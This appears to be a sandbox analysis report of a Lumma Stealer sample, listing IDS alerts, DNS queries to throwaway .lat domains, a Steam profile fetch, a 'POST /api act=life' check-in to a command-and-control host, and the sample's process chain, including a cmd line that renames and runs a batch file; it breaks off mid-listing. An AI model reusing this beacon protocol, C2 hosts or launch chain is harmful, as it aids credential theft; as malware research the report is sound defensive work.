                                                                                                                                                                                                                                    2024-12-27T22:57:38.254781+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549758104.21.66.86443TCP
                                                                                                                                                                                                                                    2024-12-27T22:57:38.838882+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549764104.21.66.86443TCP
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.623810053 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.623846054 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.623925924 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.625478029 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.625489950 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.008435965 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.008569956 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.012622118 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.012630939 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.013029099 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.056773901 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.099368095 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.771914959 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.771939039 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.771974087 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.771986961 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.771990061 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.772012949 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.772022009 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.772033930 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.772033930 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.772063971 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.970927954 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.970951080 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.970999002 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.971009016 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.971035957 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.971045017 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.986581087 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.986653090 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.986656904 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.986704111 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.988315105 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.988328934 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.988337994 CET49752443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.988347054 CET44349752104.102.49.254192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.212680101 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.212713003 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.212800026 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.213131905 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.213146925 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.475430012 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.475590944 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.477462053 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.477469921 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.477713108 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.479001045 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.479038000 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:37.479199886 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.254802942 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.254897118 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.254971981 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.255815983 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.255815983 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.255831957 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.255840063 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.260009050 CET49764443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.260096073 CET44349764104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.260193110 CET49764443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.260447979 CET49764443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.260485888 CET44349764104.21.66.86192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:38.838881969 CET49764443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Dec 27, 2024 22:56:59.993200064 CET5069053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:00.230019093 CET53506901.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:30.839598894 CET5242053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.063738108 CET53524201.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.067723036 CET6547053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.288664103 CET53654701.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.291898012 CET5190753192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.608840942 CET53519071.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.612658024 CET5265553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.921578884 CET53526551.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.923516989 CET5339853192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.230528116 CET53533981.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.234745026 CET5375953192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.453068972 CET53537591.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.456891060 CET5130153192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.762209892 CET53513011.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.765383959 CET5258253192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.069206953 CET53525821.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.072449923 CET6119053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.469008923 CET53611901.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.472315073 CET5988553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.609246969 CET53598851.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.990526915 CET5903453192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.211548090 CET53590341.1.1.1192.168.2.5
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 27, 2024 22:56:59.993200064 CET192.168.2.51.1.1.10xc9c0Standard query (0)DCNQHRSCEtLFmnzgofyjcgCPFn.DCNQHRSCEtLFmnzgofyjcgCPFnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:30.839598894 CET192.168.2.51.1.1.10xef6bStandard query (0)enterwahsh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.067723036 CET192.168.2.51.1.1.10xa427Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.291898012 CET192.168.2.51.1.1.10x495dStandard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.612658024 CET192.168.2.51.1.1.10x451aStandard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.923516989 CET192.168.2.51.1.1.10x9590Standard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.234745026 CET192.168.2.51.1.1.10xc6baStandard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.456891060 CET192.168.2.51.1.1.10xe54Standard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.765383959 CET192.168.2.51.1.1.10xb11bStandard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.072449923 CET192.168.2.51.1.1.10x1f44Standard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.472315073 CET192.168.2.51.1.1.10x3110Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:35.990526915 CET192.168.2.51.1.1.10x96adStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:00.230019093 CET1.1.1.1192.168.2.50xc9c0Name error (3)DCNQHRSCEtLFmnzgofyjcgCPFn.DCNQHRSCEtLFmnzgofyjcgCPFnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.063738108 CET1.1.1.1192.168.2.50xef6bName error (3)enterwahsh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.288664103 CET1.1.1.1192.168.2.50xa427Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.608840942 CET1.1.1.1192.168.2.50x495dName error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:31.921578884 CET1.1.1.1192.168.2.50x451aName error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.230528116 CET1.1.1.1192.168.2.50x9590Name error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.453068972 CET1.1.1.1192.168.2.50xc6baName error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:32.762209892 CET1.1.1.1192.168.2.50xe54Name error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.069206953 CET1.1.1.1192.168.2.50xb11bName error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.469008923 CET1.1.1.1192.168.2.50x1f44Name error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:33.609246969 CET1.1.1.1192.168.2.50x3110No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.211548090 CET1.1.1.1192.168.2.50x96adNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 27, 2024 22:57:36.211548090 CET1.1.1.1192.168.2.50x96adNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                    • lev-tolstoi.com
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.549752104.102.49.2544437676C:\Users\user\AppData\Local\Temp\250478\Epson.com
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-27 21:57:35 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                    2024-12-27 21:57:35 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 21:57:35 GMT
                                                                                                                                                                                                                                    Content-Length: 35121
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: sessionid=1027947316a0eccdb173bbe6; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                    2024-12-27 21:57:35 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                    2024-12-27 21:57:35 UTC16384INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                    Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                    2024-12-27 21:57:35 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22
                                                                                                                                                                                                                                    Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
                                                                                                                                                                                                                                    2024-12-27 21:57:35 UTC490INData Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74
                                                                                                                                                                                                                                    Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.549758104.21.66.864437676C:\Users\user\AppData\Local\Temp\250478\Epson.com
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-27 21:57:37 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-27 21:57:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                    2024-12-27 21:57:38 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 21:57:38 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=4l86uj82m7chvorcbhhp4hu9tt; expires=Tue, 22 Apr 2025 15:44:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OA%2BsGbgheS%2FzxJPuBBu6yi3yRPOXbqxPHIk6gMQxx%2FZiYDC45f24fe3cjo5jv5ql9SpSbwUp0UgyFnsPD2sKk7zAR3kQBxnb%2BnnfbwjL6bh3YtrV%2FcnhwR8RQytnnGBQpU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f8c913efa5a8c2f-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1814&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1551540&cwnd=228&unsent_bytes=0&cid=cb758b9c0f6b250c&ts=790&x=0"
                                                                                                                                                                                                                                    2024-12-27 21:57:38 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                                                                                    2024-12-27 21:57:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:16:56:53
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\SoftWare(1).exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:1'229'340 bytes
                                                                                                                                                                                                                                    MD5 hash:8E7A36F81E75C2D3867657FE3FE09206
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:16:56:54
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Representation Representation.cmd & Representation.cmd
                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:16:56:54
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:16:56:56
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0x730000
                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:16:56:56
